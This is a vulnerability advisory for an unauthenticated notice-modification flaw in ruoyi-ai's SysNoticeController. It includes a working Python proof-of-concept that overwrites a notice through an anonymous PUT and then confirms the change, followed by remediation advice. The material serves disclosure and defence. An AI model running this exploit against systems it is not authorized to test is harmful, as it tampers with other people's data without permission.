ageerle ruoyi-ai Improper Authorization Vulnerability in SysNoticeController
Vulnerability
A critical improper authorization vulnerability has been identified in the ageerle ruoyi-ai project, affecting versions up to and including 2.0.0. The issue resides in the SysNoticeController component, which does not check whether the caller is authorized before allowing notice records to be modified or queried. The affected endpoint is reachable remotely without any authentication, so an unauthenticated attacker can alter the system's announcement data.
Impact
Exploitation of this vulnerability allows unauthenticated users to read, modify and delete notice records, disrupting the announcements the system uses to communicate with its users.
Reproduction
The vulnerability can be reproduced by sending a PUT request to the '/prod-api/system/notice' endpoint with no authorization credentials (no session cookie and no Authorization header). The JSON body must carry the noticeId, noticeTitle and noticeContent fields; noticeId should identify an existing notice, since the update is applied by id. Once the request is accepted, the change can be confirmed by querying the notice list, which reflects the unauthorized modification.
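The reproduction above as a small Python script, added here as an example; it is not code from the advisory or from the ruoyi-ai project. It sends the PUT with no credentials, then reads the notice list back and checks that the changed title is present. Two things are assumptions not stated in the advisory: that the list is served at GET /prod-api/system/notice/list, and that both endpoints answer with a RuoYi-style JSON envelope ({"code": 200, "rows": [...]}). Run it only against an instance you are authorized to test, and use a notice you can restore afterwards.

```python
"""Reproduce and verify the unauthenticated PUT on /prod-api/system/notice.

Example code added to this advisory; not part of the ruoyi-ai project.
Assumed (not in the advisory): the list endpoint path and the JSON envelope.
"""
import json
import urllib.error
import urllib.request
from typing import Optional, Tuple

NOTICE_PATH = "/prod-api/system/notice"
NOTICE_LIST_PATH = "/prod-api/system/notice/list"  # assumed list endpoint

# Constructed sample of a list response (not captured from a real instance),
# used for the offline demonstration in __main__.
SAMPLE_LIST_RESPONSE = {"code": 200, "total": 2, "rows": [
    {"noticeId": 1, "noticeTitle": "Welcome", "noticeContent": "Hello"},
    {"noticeId": 2, "noticeTitle": "authz-check", "noticeContent": "authz-check"},
]}


def make_payload(notice_id: int, title: str, content: str) -> dict:
    """Body of the PUT; these three fields are the ones the advisory names."""
    return {"noticeId": notice_id, "noticeTitle": title, "noticeContent": content}


def _parse(raw: bytes):
    """Decode a JSON body, returning None for anything that is not JSON."""
    try:
        return json.loads(raw.decode())
    except (UnicodeDecodeError, ValueError):
        return None


def _request(base_url: str, path: str, method: str,
             body: Optional[dict] = None, timeout: float = 10.0) -> Tuple[int, object]:
    """Send a request with deliberately no session cookie or Authorization header.

    Returns (http_status, parsed_json_or_None); non-2xx answers are returned, not raised.
    """
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(
        base_url.rstrip("/") + path, data=data, method=method,
        headers={"Content-Type": "application/json", "Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, _parse(resp.read())
    except urllib.error.HTTPError as e:
        return e.code, _parse(e.read())


def update_accepted(status: int, body) -> bool:
    """True when the server applied the update instead of rejecting the anonymous caller.

    A patched instance rejects the call (HTTP 401, or HTTP 200 carrying a non-200
    code inside the JSON envelope); a vulnerable one answers HTTP 200 with code 200.
    """
    if status != 200 or not isinstance(body, dict):
        return False
    return body.get("code") == 200


def notice_reflects_change(list_body, notice_id: int, expected_title: str) -> bool:
    """Look for the modified row in the list response (assumed 'rows' envelope)."""
    if not isinstance(list_body, dict):
        return False
    for row in list_body.get("rows") or []:
        if row.get("noticeId") == notice_id:
            return row.get("noticeTitle") == expected_title
    return False


def check_target(base_url: str, notice_id: int, marker: str = "authz-check") -> str:
    """Full reproduction: unauthenticated PUT, then confirmation via the list."""
    status, body = _request(base_url, NOTICE_PATH, "PUT",
                            make_payload(notice_id, marker, marker))
    if not update_accepted(status, body):
        return f"not vulnerable (unauthenticated PUT returned HTTP {status})"
    _, list_body = _request(base_url, NOTICE_LIST_PATH, "GET")
    if notice_reflects_change(list_body, notice_id, marker):
        return "vulnerable: unauthenticated PUT changed the notice and the list reflects it"
    return "PUT accepted but change not visible in the list; inspect manually"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python poc.py https://target 2
        print(check_target(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 1))
    else:                   # offline demo on the constructed sample
        print(notice_reflects_change(SAMPLE_LIST_RESPONSE, 2, "authz-check"))
```

The verdict logic deliberately keys on the JSON envelope rather than only on the HTTP status, because RuoYi-style applications commonly return HTTP 200 with a non-200 business code when a request is rejected; a check that only looked at the status line would report a patched instance as vulnerable.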
Remediation
Users are advised to upgrade to ageerle ruoyi-ai version 2.0.1, which addresses this vulnerability by adding proper authorization checks to the SysNoticeController. Until the upgrade is applied, restricting access to the '/prod-api/system/notice' path at the reverse proxy or API gateway reduces exposure.
